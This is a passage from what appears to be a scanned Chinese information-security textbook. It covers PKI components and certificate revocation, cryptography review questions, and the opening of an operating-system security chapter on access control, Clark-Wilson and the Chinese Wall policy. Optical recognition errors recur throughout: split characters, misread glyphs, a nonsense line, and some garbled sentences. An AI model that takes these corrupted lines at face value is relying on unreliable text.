上 传 、 注 销 证 书 申请 录入 \ 注 销 证 书 申请 审核 .注销 证 书 申请 上 传 .证 书 下 载 和 制 卡 、 日 志 
管理 ,报表 统计 和 数据 库 备 份 管理 。 系 统 自动 记录 系统 内 发 生 的 每 一 事件 ,包括 系统 自动 
执行 的 和 管理 操作 执行 的 。 

3. 证 书库 

证 书库 是 CA 颁发 证 书 和 撤销 证 书 的 集中 存放 地 , 它 像 网 上 的 “ 白 页 ”一 样 ,是 网 上 的 
公共 信息 库 , 可 供 公 众 进行 开放 式 查 询 。 一 般 来 说 ,查询 的 目的 有 两 个 : 其 一 是 想得到 与 
之 通信 实体 的 公 钥 ,其 二 是 要 验证 通信 对 方 的 证 书 是 否 已 进入 “* 黑 名 单 ”。 证 书库 的 构造 
一 般 采 用 轻 量 级 目录 访问 协议 (Lightweight Directory Access Protocol, LDAP) ,搭建 分 
布 式 的 目录 系统 。 

CA 将 证 书 发 送 到 X. 500 格式 的 目录 服务 器 上 ,用 户 可 通过 LDAP 访问 已 经 颁发 的 
证 书 、 下 载 证 书 撤销 列表 。 证 书库 支持 分 布 式 存放 。 可 采用 数据 库 镜 像 技 术 , 将 相关 的 证 
书 和 证 书 撤销 列表 从 目录 服务 器 下 载 并 存储 到 本 地 ,以 提高 证 书 的 查询 效率 ,这 是 一 个 大 
型 PKI 系 统 的 基本 应 用 需求 。 

4. 密 钥 管理 系统 

密 钥 管理 是 一 门 综合 性 的 技术 ,涉及 密 钥 的 产生 、 检 验 、 分 配 、 传 递 、 保 管 . 使 用 .销毁 
的 全 过 程 。CA 中 心 不 在 其 任何 设备 保存 用 户 的 私有 密 钥 。 如 果 需 要 托管 密 钥 , 则 密 钥 
的 托管 由 密 钥 管理 中 心 负责 。 密 钥 管理 中 心 不 备 份 用 户 私 有 的 签名 密 钥 ,用 户 应 备份 他 
们 的 私有 签名 密 钥 ,并 确保 这 些 密 钥 的 安全 ; 密 钥 管理 中 心 可 备份 用 户 要 求 托管 的 私有 加 
密 密 钥 及 一 些 相关 信息 ,并 确保 密 钥 得 到 安全 的 保护 。 

5. 证 书 撤销 管理 系统 

证 书 撤销 处 理 是 PKI 平 台 的 另 一 重要 工作 ,证书 和 密 钥 都 有 一 定 的 生存 期 限 。 当 用 
户 的 密 钥 泄露 或 公司 某 职员 离职 时 ,都 需要 撤销 原 CA 证 书 。 这 种 撤销 应 该 是 及 时 的 , 因 
为 如 果 撤 销 延 迟 的 话 ,会 使 得 不 再 有 效 的 证 书 仍 被 使 用 ,将 造成 一 定 的 损失 。 在 CA 中 ， 
证 书 的 撤销 使 用 的 手段 是 证 书 撤销 列表 或 称 为 CRL。 即 将 作废 的 证 书 放 入 CRL 中 ,并 
及 时 的 公布 于 众 , 根 据 实 际 情况 不 同 可 以 采取 周期 性 发 布 机 制 和 在 线 查询 机 制 两 种 方式 。 

6. PKI 应 用 接口 

PKI 应 用 接口 是 使 用 者 与 PKI 交互 的 唯一 途径 ,其 重要 性 不 言 而 喻 。PKI 应 用 接口 
也 可 以 看 成 是 PKI 的 客户 端 软 件 , 使 用 者 在 其 计算 机 中 安装 PKI 客户 端 软件 ,以 实现 数 
字 签 名 、 加 密 传 输 数 据 等 功能 。 此 外 ,客户 端 软件 还 负责 在 认证 过 程 中 ,查询 证 书 和 相关 
证 书 的 撤销 信息 以 及 进行 证 书 路 径 处 理 、 对 特定 文档 提供 时 间 戳 请 求 等 。 

一 个 典型 的 PKI 模 型 如 图 4-28 所 示 。CA 服务 器 是 整个 PKI 系统 的 核心 ,负责 证 书 
的 签发 管理 。CA 首先 产生 自己 的 公私 密 钥 对 ,生成 自 签名 的 根 证 书 。 然 后 需要 为 认证 
中 心 操作 员 、 安 全 服务 器 、 注 册 服 务 器 RA 等 生成 数字 证 书 。 完 成 CA 的 初始 建设 , 接 下 
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来 为 子 CA 认证 机 构 和 用 户 提供 数字 证 书 的 签发 .更 新 和 撤销 等 服务 。 
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图 4-28 ”典型 的 PKI 模型 


RA 服务 器 主要 面向 业务 受理 操作 员 .负责 登记 .审核 用 户 申请 信息 ,包括 注册 申请 
和 证 书 撤销 申请 ,并 将 相关 信息 传 给 CA 服务 器 和 LDAP。 

安全 服务 器 主要 负责 RA 服务 器 和 CA 服务 器 的 安全 ,用 户 的 各 种 请 求 操作 都 在 其 
监管 下 进行 ,这 些 操作 包括 证 书 申请 、 浏 览 请 求 .证 书 撤销 及 证 书 下 载 等 服务 。 

轻 量 目录 访问 协议 LDAP 是 基于 X. 500 标准 的 设计 实现 的 ,同时 支持 TCP/IP 协 
议 , 便 于 Internet 用 户 访问 。LDAP 是 一 个 用 来 发 布 不 同 资源 的 目录 信息 的 协议 。 通 常 
它 都 作为 一 个 集中 的 地 址 薄 使 用 ,不 过 根据 组 织 者 的 需要 , 它 可 以 做 得 更 加 强大 。 一 般 在 
LDAP 目录 中 可 以 存储 各 种 类 型 的 数据 : 电子 邮件 地 址 、 邮 件 路 由 信息 、 人 力 资 源 数据 、 
公用 密 钥 、 联 系 人 列表 等 信息 。 在 PKI 系统 中 ,LDAP 服务 器 负责 将 CA 发 送 过 来 的 用 
户 信息 ,数字 证 书 和 证 书 撤销 列表 等 信息 公布 到 网 络 上 ,提供 给 用 户 查询 下 载 。 

数据 库 服务 器 主要 用 于 存储 认证 机 构 中 的 数据 (如 密 钥 、 用 户 信息 等 ) .日 志和 统计 信 
息 ,以 便 用 户 下 载 以 及 重要 的 数据 备份 。 

一 个 典型 的 PKI 系统 应 该 提供 如 下 功能 : 

(1) 接收 验证 用 户 数 字 证 书 的 申请 。 

(2) 确定 是 否 接受 用 户 数字 证 书 的 申请 , 即 证 书 的 审批 。 

(3) 向 申请 者 颁发 (或 拒绝 颁发 ) 数 字 证 书 。 

(4) 接收 ,处 理 用 户 的 数字 证 书 更 新 请 求 。 

(5) 接收 用 户 数 字 证 书 的 查询 撤销 。 

(6) 产生 和 发 布 证 书 的 有 效 期 。 
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(7) 数字 证 书 的 归档 。 

(8) 密 钥 归档 。 

(9) 历史 数据 归档 。 

PKI 技术 支持 SSL IP over VPN、S/MIME 等 协议 ,从 而 可 以 支持 加 密 Web、VPN、 
安全 邮件 等 应 用 。PKI 还 支持 不 同 CA 之 间 的 交叉 认证 ,并 能 实现 证 书 、 密 钥 对 的 自动 更 
换 , 这 扩展 了 它 的 应 用 范围 。 目 前 ,PKI 的 特性 融入 各 种 应 用 (如 防火 墙 \ 浏 览 器 、 网 络 操 
作 系 统 等 ) 也 正在 成 为 趋势 。 


4.7 本 章 小 结 


密码 学 是 保障 信息 安全 的 核心 ,信息 安全 是 密码 学 研究 与 发 展 的 目标 。 保 证 数字 信 
息 机 密 性 的 最 有 效 方 法 是 使 用 密码 算法 对 其 进行 加 密 ;保证 信息 完整 性 的 有 效 方法 是 利 
用 Hash 函数 计算 信息 “指纹 ”, 实 现 完整 性 检验 ;保证 信息 认证 性 的 有 效 方法 是 密 钥 和 
Hash 函数 结合 来 确定 信息 的 来 源 ;保证 信息 不 可 抵赖 性 的 有 效 方 法 是 对 信息 进行 数字 
签名 。 此 外 ,利用 密码 机 制 以 及 密 钥 管理 技术 可 以 有 效 地 控制 信息 ,使 信息 系统 只 为 合法 
授权 用 户 所 用 。 
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思 考 题 
. 简 述 密码 体制 的 组 成 部 分 及 其 分 类 。 


. 列举 出 密码 体制 常见 的 攻击 形式 并 加 以 解释 。 
. 简 述 香农 提出 的 设计 密码 体制 的 两 种 基本 方法 。 
. 简 述 分 组 密码 的 工作 模式 。 

. 简 述 序列 密码 与 分 组 密码 的 不 同 。 

. 解释 单 向 陷 门 函数 的 含义 。 

. 简 述 Hash 函数 应 具有 的 性 质 。 

. 说 明 数字 签名 与 手写 签名 的 区 别 。 

10. 简 述 密 钥 管理 的 层次 结构 。 

11. 简 述 Diffie-Hellman 密 钥 协商 协议 过 程 。 


忆 oo 站 四 辐 忆 上 性 


. 分 别 说 明 对 称 密码 体制 和 非 对 称 密码 体制 的 优点 和 不 足 。 
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操作 系统 安全 


本 章 学 习 要 点 : 

名 了 解 安 全 操作 系统 的 安全 策略 与 模型 ; 
如 了 和 解 安全 操作 系统 的 访问 控制 机 制 ; 
名 了 解 安 全 操作 系统 的 评测 方法 与 准则 。 


操作 系统 是 整个 计算 机 系统 的 基础 , 它 管理 计算 机 资源 ,控制 整个 系统 的 运行 、 直 接 
和 硬件 打交道 ,并 为 用 户 提供 接口 。 无 论 是 数据 库 系统 、 应 用 软件 还 是 网 络 环境 ,它们 都 
是 建立 在 操作 系统 之 上 的 ,都 是 通过 操作 系统 来 完成 对 信息 的 访问 和 处 理 。 因 此 ,可 以 认 
为 操作 系统 安全 是 整个 信息 安全 的 必要 条 件 。 因 此 ,它们 经 常 是 被 攻击 的 目标 。 


5.1 安全 操作 系统 概述 


1. 定义 及 术语 

可 信 计 算 基 (Trusted Computing Base,.TCB): 计算 机 系统 内 保护 装置 的 总 体 , 包 括 
硬件 .固件 .软件 和 负责 执行 安全 策略 的 组 合体 。 它 建立 了 一 个 基本 的 保护 环境 并 提供 一 
个 可 信 计 算 系 统 所 要 求 的 附加 用 户 服务 。 

自主 访问 控制 (Discretionary Access Control,DAC) : 用 来 决定 一 个 用 户 是 否 有 权限 
访问 此 客体 的 一 种 访问 约束 机 制 , 该 客体 的 所 有 者 可 以 按照 自己 的 意愿 指定 系统 中 的 其 
他 用 户 对 此 客体 的 访问 权 。 

敏感 标记 (Sensitivity Label) : 用 以 表示 客体 安全 级 别 并 描述 客体 数据 敏感 性 的 一 组 
信息 ,在 可 信 计 算 基 中 把 敏感 标记 作为 强制 访问 控制 决策 的 依据 。 

强制 访问 控制 (Mandatory Access Control, MAC): 用 于 将 系统 中 的 信息 分 密级 和 类 
进行 管理 ,以 保证 每 个 用 户 只 能 够 访问 那些 被 标明 可 以 由 他 访问 的 信息 的 一 种 访问 约束 
机 制 。 

角色 (Role) : 系统 中 一 类 访问 权限 的 集合 。 

隐 菩 信道 (Covert Channel) : 允许 进程 以 危害 系统 安全 策略 的 方式 传输 信息 的 通信 


客体 重用 (Object Reuse) : 对 曾经 包含 一 个 或 几 个 客体 的 存 贮 介质 (如 页 框 、 盘 扇面 、 
磁带 ) 重 新 分 配 和 重用 。 为 了 安全 进行 地 重 分 配 、 重 用 ,要 求 介质 不 得 包含 重 分 配 前 的 残 
留 数据 。 
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可 信 通 路 (Trusted Path) : 终端 人 员 能 借以 直接 同 可 信 计 算 基 通信 的 一 种 机 制 。 该 
机 制 只 能 由 有 关 终 端 操作 人 员 或 可 信 计 算 基 启动 ,并 且 不 能 被 不 可 信和 软件 模仿 。 

多 级 安全 (MultiLevel Secure,MLS) : 一 类 包含 不 同等 级 敏感 信息 的 系统 , 它 既 可 供 
具有 不 同安 全 许可 的 用 户 同时 进行 合法 访问 ,又 能 阻止 用 户 去 访问 其 未 被 授权 的 信息 。 

安全 操作 系统 (Secure Operating System) : 能 对 所 管理 的 数据 与 资源 提供 适当 的 保 
护 级 ` 有 效 地 控制 硬件 与 软件 功能 的 操作 系统 。 就 安全 操作 系统 的 形成 方式 而 言 ,一 种 是 
从 系统 开始 设计 时 就 充分 考虑 到 系统 的 安全 性 的 安全 设计 方式 。 另 一 种 是 基于 一 个 通用 
的 操作 系统 ,专门 进行 安全 性 改进 或 增强 的 安全 增强 方式 。 安 全 操作 系统 在 开发 完成 后 ， 
在 正式 投入 使 用 之 前 一 般 都 要 求 通过 相应 的 安全 性 评测 。 

多 级 安全 操作 系统 (Multilevel Secure Operating System) : 实现 了 多 级 安全 策略 的 
安全 操作 系统 ,比如 符合 美国 TCSEC Bl 级 以 上 的 安全 操作 系统 。 

2. 安全 操作 系统 

安全 是 一 个 互 斥 的 概念 : 即 事物 要 么 是 安全 的 ,要 么 是 不 安全 的 。 如 果 它 是 安全 的 ， 
那 它 应 该 能 够 抵抗 所 有 的 攻击 。 安 全 只 是 质量 的 一 个 方面 ;假如 能 够 选择 ,你 可 以 在 安全 
和 其 他 的 特性 (比如 速度 或 者 用 户 友 好 性 ) 之 间 做 出 权衡 ,以 确定 一 个 最 佳 系统 。 特 别 地 ， 
你 建立 或 选择 的 系统 可 能 非常 出 色 , 却 未 必 能 满足 你 的 安全 期 望 。 

从 安全 角度 来 看 ,操作 系统 软件 的 配置 是 很 困难 的 ,配置 时 一 个 很 小 的 错误 就 可 能 导 
致 一 系列 安全 漏洞 。 例 如 配置 文件 所 有 权 和 权限 时 ,常常 由 于 文件 的 账户 所 有 权 不 正确 
或 文件 权限 设置 的 不 正确 而 导入 潜在 漏洞 。 因 此 建立 一 个 安全 的 信息 系统 较 之 建立 一 个 
正确 无 误 的 信息 系统 要 简单 得 多 。 但 是 目前 市 场 上 尚 无 任何 一 个 大 型 操作 系统 可 以 做 到 
完全 正确 。 所 有 大 型 操作 系统 的 生产 厂商 都 定期 推出 新 的 操作 系统 版 本 ,其 中 包括 数 以 
千 计 修改 了 的 语句 和 代码 ,而 这 些 改 动 绝 大 多 数 是 为 了 纠正 系统 中 的 错误 或 弥补 其 缺陷 
而 进行 的 。 实 际 上 从 来 没有 一 个 操作 系统 的 运行 是 完美 无 缺 的 ,也 没有 一 个 厂商 敢 保 证 
他 们 的 操作 系统 不 会 出 错 。 工 业界 已 经 承认 这 样 一 个 事实 : 任何 操作 系统 都 是 有 缺陷 
的 。 但 是 另 一 方面 , 绝 大 多 数 操作 系统 是 可 靠 的 ,可 以 基本 完成 其 设计 功能 。 

就 计算 机 安全 而 言 ,一 个 操作 系统 仅仅 完成 其 大 部 分 的 设计 功能 是 远 远 不 够 的 。 当 
计算 机 操作 系统 某 个 功能 模块 上 只 有 一 个 不 太 重要 的 故障 时 ,可 以 忽略 它 ,这 对 整个 操作 
系统 的 功能 影响 甚 微 ,一 般 而 言 只 有 若干 种 故障 的 某 种 特定 组 合 才 可 能 会 对 操作 系统 造 
成 致命 的 影响 。 但 是 在 安全 领域 ,情况 就 并 非 如 此 简单 。 在 信息 系统 中 与 安全 相关 的 每 
一 个 漏洞 都 会 使 整个 系统 的 安全 控制 机 制 变 得 毫 无 价值 。 这 个 漏洞 如 果 被 蓄意 入 侵 者 发 
现 , 后 果 将 是 十 分 严重 的 。 这 如 同一 个 墙 上 有 洞 的 房间 ,虽然 可 以 居住 , 却 无 法 将 盗贼 拒 
之 门 外 5 

从 计算 机 信息 系统 的 角度 分 析 , 可 以 看 出 在 信息 系统 安全 所 涉及 的 众多 内 容 中 ,操作 
系统 、 数 据 库 管理 系统 与 网 络 系统 的 安全 问题 是 核心 。 数 据 库 通 常 建 立 在 操作 系统 之 上 ， 
如 果 没 有 操作 系统 安全 机 制 的 支持 ,就 不 可 能 保障 其 访问 控制 的 安全 可 信 性 。 在 网 络 环 
境 中 ,网 络 的 安全 可 信 性 依赖 于 各 主机 系统 的 安全 可 信 性 ,没有 操作 系统 的 安全 性 ,就 不 
会 有 主机 系统 和 网 络 系统 的 安全 性 。 而 像 密 码 认 证 系统 (如 Kerberos) 的 密 钥 分 配 服 务 
器 的 自身 安全 性 、IPSec 网 络 安全 协议 的 安全 性 等 ,虽然 主要 依赖 应 用 层 的 密 钥 管理 功 
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能 ,但 如 果 不 相信 操作 系统 可 以 保护 数据 文件 , 那 就 不 应 该 相信 它 总 能 够 适时 地 加 密 文件 
并 能 妥善 地 保护 密 钥 。 若 无 安全 的 操作 系统 作为 基础 ,数据 加 密 就 成 了 “ 纸 环 上 套 了 个 铁 
环 ”。 仅 有 应 用 层 的 安全 措施 是 绝对 不 够 的 ,系统 还 特别 需要 把 安全 操作 系统 作为 安全 的 
基石 。 

因此 操作 系统 的 安全 性 在 计算 机 信息 系统 的 整体 安全 性 中 具有 至 关 重要 的 作用 , 没 
有 操作 系统 提供 的 安全 性 ,信息 系统 的 安全 性 是 没有 基础 的 。 

一 般 来 说 操作 系统 安全 与 安全 操作 系统 的 含义 不 尽 相 同 , 操 作 系 统 的 安全 性 是 必需 
的 ,而 安全 操作 系统 的 安全 性 则 是 其 特色 。 安 全 操作 系统 是 针对 安全 性 开发 增强 的 ,并 且 
一 般 与 相应 的 安全 等 级 相对 应 。 可 以 评价 任何 一 个 操作 系统 的 安全 性 ,并 可 以 说 它们 都 
具有 一 定 的 安全 性 , 却 不 能 说 它们 都 是 安全 操作 系统 。 但 二 者 又 是 统一 的 和 密 不 可 分 的 ， 
因为 它们 都 在 讨论 系统 的 安全 性 。 


5.2 安全 策略 与 安全 模型 


521 安全 策略 


安全 策略 是 指 有 关 管 理 . 保 护 和 发 布 敏感 信息 的 法 律 .规定 和 实施 细则 。 例 如 ,可 以 
将 安全 策略 定义 为 : 系统 中 的 用 户 和 信息 被 划分 为 不 同 的 层次 ,一 些 级 别 比 另 一 些 级 别 
高 ;而 且 如 果 主 体能 读 访 问 客体 , 当 且 仅 当 主体 的 级 别 高 于 或 等 于 客体 的 级 别 ;如 果 主 体 
能 写 访问 客体 , 当 且 仅 当 主体 的 级 别 低 于 或 等 于 客体 的 级 别 。 

说 一 个 操作 系统 是 安全 的 ,是 指 它 满足 某 一 给 定 的 安全 策略 。 同 样 进行 安全 操作 系 
统 的 设计 和 开发 时 ,也 要 围绕 一 个 给 定 的 安全 策略 进行 。 安 全 策略 由 一 整套 严密 的 规则 
组 成 ,这 些 确定 授权 访问 的 规则 是 决定 访问 控制 的 基础 。 许 多 系统 的 安全 控制 遭 到 失败 ， 
主要 不 是 因为 程序 错误 ,而 是 因为 没有 明确 的 安全 策略 。 

1. 军事 安全 策略 

军事 安全 策略 是 基于 保护 机 密 信 息 的 策略 。 每 条 信息 被 标识 为 一 个 特定 的 等 级 ,如 
公开 、 受 限制 秘密、 机 密 和 绝密 。 这 些 等 级 构成 了 一 个 层次 结构 ,如 图 5-1 所 示 。 使 用 须 
知 原则 来 限制 访问 : 只 有 那些 在 工作 中 需要 知道 某 些 数据 的 主体 才 允 许 访问 相应 的 数 
据 。 每 条 机 密 信息 都 与 一 个 或 更 多 的 项 目 相关 ,这 些 项 目 被 称 为 分 隔 项 (Compartment) ， 
它 描述 了 信息 的 相关 内 容 。 比 如 : A 项 目 要 用 到 机 密 信息 ,而 B 项 目 也 要 用 到 机 密 信息 ， 
但 是 A 项 目 中 的 员工 并 不 需要 访问 B 的 信息 。 换 句 话 说 ,两 个 项 目 都 会 使 用 机 密 信息 ， 
但 每 个 项 目 只 能 访问 与 它 相关 的 机 密 信 息 。 分 隔 项 以 这 种 方式 帮助 实施 须知 限制 ,使 人 
们 只 能 访问 那些 与 他 们 工作 相关 的 信息 。 一 个 分 隔 项 的 信息 可 以 只 属于 一 个 安全 等 级 ， 
也 可 以 属于 不 同 的 安全 等 级 。 一 个 用 户 必 须 得 到 许可 (Clearance) 才 能 够 访问 相关 信息 。 
许可 表明 可 以 信赖 某 人 访问 某 个 级 别 以 下 的 相关 信息 ,以 及 该 人 需要 知道 某 些 类 的 相关 
信息 。 

军事 安全 同时 实施 了 安全 等 级 要 求 和 须知 要 求 。 安 全 等 级 要 求 是 层次 化 的 要 求 , 因 
为 它们 反映 了 安全 等 级 的 层次 结构 ;而 须知 限制 是 非 层次 化 的 ,因为 分 隔 项 不 需要 表现 为 
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图 5-1 安全 等 级 层次 结构 


一 个 层次 结构 。 许 可 和 分 类 通常 由 一 些 被 称 为 安全 职员 的 人 控制 ,而 并 不 是 个 人 能 够 随 
便 改 变 的 。 

2. 商业 安全 策略 

商业 企业 非常 关心 安全 问题 。 它 们 担心 商业 间谍 会 将 自己 正在 开发 中 的 产品 消息 透 
露 给 自己 的 竞争 对 手 。 同 样 ,公司 通常 也 非常 希望 能 够 保护 其 金融 信息 。 因 此 ,即便 商业 
界 不 像 军事 领域 那样 严格 苛刻 和 层次 化 ,在 商业 安全 策略 中 仍然 会 发 现 许多 与 军事 安全 
策略 相同 的 概念 。 比 方 说 ,一 个 大 的 机 构 , 如 一 家 公司 或 一 所 大 学 ,可 能 会 被 分 成 许多 个 
组 或 者 部 门 , 他 们 各 自负 责 不 同 的 项 目 。 当 然 ,还 可 能 存在 一 些 机 构 级 的 职责 ,比如 财务 
或 者 人 事 。 位 于 不 同 级 别 的 数据 项 具有 不 同 的 安全 等 级 ,例如 ,公共 的 、 专 有 的 或 内 部 的 ， 
在 这 里 ,级 别 的 名 字 可 能 会 因 组 织 不 同 而 不 同 , 并 没有 一 个 通用 的 层次 结构 。 

假设 公共 信息 不 如 专 有 信息 敏感 ,而 专 有 信息 又 不 如 内 部 信息 敏感 。 因 此 ,项 目 和 部 
门 应 尽 可 能 被 细 分 ,其 中 可 能 存在 一 些 人 同时 参与 两 个 或 者 多 个 项 目 。 机 构 级 的 职责 趋 
向 于 涵盖 所 有 的 部 门 和 项 目 ,因为 公司 的 所 有 人 都 需要 财务 或 者 人 事 数据 。 但 是 ,即便 是 
机 构 级 的 数据 也 可 能 有 敏感 度 。 

商业 信息 安全 和 军事 信息 安全 有 两 个 很 显著 的 区 别 。 第 一 ,在 军事 以 外 ,通常 没有 正 
式 的 “许可 ”概念 : 从 事 商业 项 目的 人 不 需要 得 到 中 心安 全 职员 的 正式 批准 就 可 以 访问 某 
个 项 目 。 典 型 地 ,在 允许 一 个 雇员 访问 内 部 数据 之 前 不 需要 对 其 授予 不 同 的 信任 度 。 第 
二 ,由 于 没有 正式 的 “许可 ”概念 ,所 以 允许 访问 的 规则 不 太 规范 。 例 如 ,如 果 一 个 高 级 经 
理 认 为 某 人 A 需要 访问 某 个 项 目的 一 段 内 部 数据 ,那么 他 就 会 向 某 人 B 下 达 一 个 命令 ， 
允许 A 访问 数据 ,并 指出 允许 A 访问 的 时 限 : 要 么 只 允许 A 访问 一 次 ,要 么 允许 可 A 一 
直 访 问 这 些 数 据 。 因 此 ,对 于 大 多 数 商 业 信 息 访 问 不 存在 一 个 支配 函数 ,因为 没有 正式 的 
“商业 许可 ”概念 。 
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到 目前 为 止 ,本 书 讨论 的 主要 内 容 都 只 集中 在 读 访问 上 ,而 且 都 只 专注 于 安全 方面 的 
机 密 性 。 事 实 上 ,这 种 狭义 的 观点 在 现行 的 大 多 数 计算 机 安全 工作 中 都 是 正确 的 。 然 而 ， 
完整 性 和 可 用 性 在 许多 情况 下 和 机 密 性 至 少 是 同等 重要 的 。 在 军事 和 商业 领域 中 ,对 完 
整 性 和 可 用 性 策略 的 阐述 明显 没有 机 密 性 策略 那么 详细 。 下 面 探讨 一 些 有 关 完 整 性 的 
实例 。 

1) Clark-Wilson 商业 安全 策略 

在 很 多 商业 应 用 中 ,完整 性 的 重要 性 至 少 和 机 密 性 相当 。 财 务 记录 的 正确 性 、 法 律 工 
作 的 精确 性 以 及 医疗 的 合适 时 间 ,都 是 各 自 领 域 中 最 基本 的 东西 。Clark 和 Wilson 为 他 
们 所 称 的 良 构 事务 (Well-Formed Transaction) 提供 了 一 个 策略 。 他 们 声称 ,这 个 策略 在 
各 自 领域 中 的 重要 性 就 像 机 密 性 在 军事 领域 中 一 样 。 

为 了 明白 其 中 原因 ,考虑 这 样 一 个 例子 : 一 家 公司 预订 货物 ,然后 付款 。 典 型 的 流程 
如 下 所 示 : 

(1) 采购 员 先 做 一 张 供应 订单 ,并 把 订单 同时 发 给 供 货 方 和 收 货 部 门 。 

(2) 供 货 方 将 货物 运 到 收 货 部 门 。 接 收 员 检查 货物 ,确保 收 到 货物 的 种 类 和 数量 是 
正确 的 ,然后 在 送 货 单 上 签字 。 送 货 单 和 原始 订单 再 交 给 财务 部 门 。 

(3) 供 货 方 将 发 票 送 到 账 务 部 门 。 财 务 人 员 将 发 票 同 原始 订单 进行 校对 (校对 价格 
和 其 他 条 款 ) 和 将 发 票 同 送 货 单 进行 校对 (校对 数量 和 品种 ) ,然后 开支 票 给 供 货 方 。 

流程 运作 的 顺序 非常 重要 。 收 货 员 在 没有 接收 到 与 订单 相符 的 货物 之 前 是 不 能 够 签 
署 送 货 单 的 (因为 这 样 就 等 于 允许 供 货 方 随便 把 他 们 想 卖 出 去 的 任何 货物 卖 给 收 货 方 )， 
而 财务 人 员 在 收 到 一 份 与 实际 收 到 货物 相 匹 配 的 订单 和 送 货 单 之 前 ,也 不 能 够 开支 票 ( 因 
为 如 果 没 有 订购 某 种 货物 ,或 者 没有 收 到 订购 的 货物 ,就 不 应 该 付款 给 供 货 方 )。 而 且 , 在 
大 多 数 实 例 中 ,订单 和 送 货 单 都 需要 由 某 个 被 授权 的 人 员 来 签署 。 委 任 专 人 按 顺 序 准确 
执行 以 上 步骤 ,就 构成 了 一 个 良 构 事务 。Clark-Wilson 策略 的 目标 是 使 内 部 数据 和 它们 
的 外 部 (用 户 ) 期 望 保持 一 致 。 

Clark 和 Wilson 用 受 约 东 数据 项 来 表达 他 们 的 策略 , 受 约束 数据 项 由 转变 程序 
(Transformation Procedure) 进 行 处 理 。 转 变 程序 就 像 一 个 监控 器 , 它 对 特定 种 类 的 数据 
项 执行 特定 的 操作 ;只 有 转变 程序 才能 对 这 些 数据 项 进行 操作 。 和 转变 程序 通过 确认 这 些 
操作 已 经 执行 来 维持 数据 项 的 完整 性 。Clark 和 Wilson 将 这 个 策略 定义 为 访问 三 元 组 
(Access Triples) : 《Userid ,Tpi,{Cdij ,Cdik,…)), 通 过 它 将 转变 程序 一 个 或 多 个 受 约 
东 数 据 项 以 及 用 户 识别 结合 起 来 ,其 中 用 户 是 指 那些 已 被 授权 且 以 事务 程序 的 方式 操作 
数据 项 的 人 。 

2) 中 国 墙 安 全 策略 

Brewer 和 Nash 定义 了 一 个 名 为 中 国 墙 (Chinese Wall) 的 策略 ,这 个 策略 反映 了 对 
信息 访问 保护 的 某 种 商业 需求 。 安 全 需求 反映 了 与 某 些 特定 人 群 相关 的 问题 ,这 些 人 在 
法 律 、 医 疗 .投资 或 者 会 计 事务 中 有 可 能 存在 利益 冲突 。 当 一 家 公司 的 某 个 人 获得 了 其 竞 
争 对 手 关 于 人 力 .产品 或 者 服务 的 敏感 信息 时 ,利益 冲突 便 随 之 产生 了 。 

安全 策略 建立 在 三 个 抽象 等 级 上 : 

(1) 对 象 (Object) : 位 于 最 低 等 级 ,例如 文件 。 每 个 文件 只 包含 一 个 公司 的 信息 。 
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(2) 公司 群体 (Company Group): 位 于 第 二 个 等 级 ,由 与 一 家 特定 公司 相关 的 所 有 对 
象 组 成 。 

(3) 冲突 类 (Conflict Class) : 位 于 最 高 等 级 ,相互 竞争 的 公司 的 所 有 对 象 集合 。 

在 这 个 模型 中 ,每 个 对 象 都 属于 唯一 的 一 个 公司 群体 ,而 每 一 个 公司 群体 又 被 包含 在 
一 个 唯一 的 冲突 类 中 。 例 如 ,假设 你 是 一 家 广告 公司 ,有 着 几 个 分 属于 不 同 领域 的 客户 : 
巧克力 公司 、 银 行 和 航空 公司 。 你 可 能 想 要 存储 一 些 数 据 ,这 些 数据 和 巧克力 公司 
Suchard、Cadbury, 银 行 Citicorp、Deutsche Bank、Credit Lyonnais, 以 及 航空 公司 SAS 有 
关 。 运 用 中 国 墙 的 等 级 结构 ,会 形成 6 个 公司 群体 (每 个 公司 一 个 ) 和 3 个 冲突 类 : 
{Suchard,Cadbury},{Citicorp ,Deutsche Bank ,Credit Lyonnais} 和 {SAS}。 

这 个 层次 结构 引导 出 一 个 简单 的 访问 控制 策略 : 只 要 一 个 人 至 多 访问 过 一 个 冲突 类 
中 某 一 个 公司 的 信息 ,那么 他 就 可 以 访问 该 冲突 类 中 的 任何 信息 。 也 就 是 说 ,如 果 被 访问 
的 对 象 所 属 的 公司 群体 中 的 某 个 对 象 已 被 访问 过 ,或 者 这 个 对 象 所 属 的 冲突 类 从 未 被 访 
问 过 ,那么 就 允许 访问 该 对 象 。 在 上 例 中 ,最 初 可 以 访问 任何 对 象 。 假 设 读 了 Suchard 上 
的 一 个 文件 , 接 下 来 的 访问 请 求 如 果 是 针对 银行 或 者 SAS 的 ,就 会 被 许可 。 但 是 如 果 请 
求 访问 Cadbury 就 会 被 拒绝 。 接 下 来 对 SAS 的 访问 不 会 影响 你 将 来 的 访问 。 但 如 果 接 
下 来 访问 了 Credit Lyonnais 上 的 文件 ,将 来 就 不 可 以 访问 Deutsche Bank 或 者 Citicorp。 
基于 这 个 观点 ,你 只 能 访问 和 Suchard、SAS、Credit Lyonnais 或 者 新 定义 的 冲突 类 有 关 
的 对 象 。 

中 国 墙 策略 在 商界 中 是 非常 有 名 的 机 密 策略 。 和 其 他 的 商业 策略 不 同 ,中 国 墙 策略 
注重 完整 性 。 有 趣 的 是 , 它 的 访问 许可 能 动态 地 变化 : 当 一 个 主体 访问 某 些 对 象 后 , 它 就 
不 能 够 访问 先前 可 以 访问 的 这 一 类 中 的 其 他 对 象 了 。 
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安全 模型 则 是 对 安全 策略 所 表达 的 安全 需求 的 简单 .抽象 和 无 歧义 的 描述 , 它 为 安全 
策略 和 安全 策略 实现 机 制 的 关联 提供 了 一 种 框架 。 安 全 模型 描述 了 对 某 个 安全 策略 需要 
用 哪 种 机 制 来 满足 ;而 模型 的 实现 则 描述 了 如 何 把 特定 的 机 制 应 用 于 系统 中 ,从 而 实现 某 
一 特定 安全 策略 所 需 的 安全 保护 。 

J. P. Anderson 指出 要 开发 安全 系统 首先 必须 建立 系统 的 安全 模型 。 安 全 模型 给 出 
了 安全 系统 的 形式 化 定义 ,并 且 正 确 地 综合 系统 的 各 类 因素 。 这 些 因素 包括 系统 的 使 用 
方式 、 使 用 环境 类 型 ,授权 的 定义 共享 的 客体 (系统 资源 )、 共 享 的 类 型 和 受 控 共享 思想 
等 。 构 成 安全 系统 的 形式 化 抽象 描述 ,使 得 系统 可 以 被 证 明 是 完整 的 .反映 真实 环境 的 、 
逻辑 上 能 够 实现 程序 的 受 控 执行 的 。 

安全 模型 有 以 下 几 个 特点 : 

